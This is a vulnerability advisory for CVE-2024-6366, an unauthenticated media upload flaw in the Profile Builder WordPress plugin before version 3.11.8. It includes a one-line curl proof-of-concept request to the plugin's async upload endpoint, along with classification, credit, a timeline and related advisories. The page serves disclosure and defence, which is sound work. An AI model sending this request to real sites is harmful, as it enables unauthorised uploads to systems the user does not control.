User Profile Builder < 3.11.8 – Unauthenticated Media Upload | CVE 2024-6366

Description

The plugin does not have proper authorisation, allowing unauthenticated users to upload media files via the async upload functionality of WP.

Proof of Concept

curl -vvvv -X POST -F 'wppb_upload=true' \
     -F 'meta_name=test.jpg' \
     -F '_wpnonce=e8' \
     -F 'action=upload-attachment' \
     -F 'async-upload=@test.jpg' \
     https://example.com/wp-admin/async-upload.php

Affects Plugins

profile-builder

Fixed in 3.11.8

References

CVE

CVE-2024-6366

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CWE-862

CVSS

5.3 (medium)

Miscellaneous

Original Researcher

Michel Prunet

Submitter

Michel Prunet

Verified

Yes

WPVDB ID

5b90cbdd-52cc-4e7b-bf39-bea0dd59e19e

Timeline

Publicly Published

2024-07-08 (about 1 year ago)

Added

2024-07-08 (about 1 year ago)

Last Updated

2024-07-08 (about 1 year ago)

Other

Published

Title

Published

2024-06-03

Title

Admin Notices Manager < 1.5.0 - Missing Authorization to Authenticated (Subscriber+) User Email Retrieval

Published

2023-11-06

Title

Limit Login Attempts Reloaded < 2.25.26 - Admin+ Missing Authorization to Toggle Plugin Auto-Update

Published

2023-02-24

Title

WP Meta SEO < 4.5.4 - Subscriber+ SiteMap Settings Update

Published

2025-10-08

Title

Salient Core < 3.0.9 - Missing Authorization

Published

2025-02-11

Title

Apus Framework <= 2.4 - Authenticated (Subscriber+) Arbitrary Options Update in import_page_options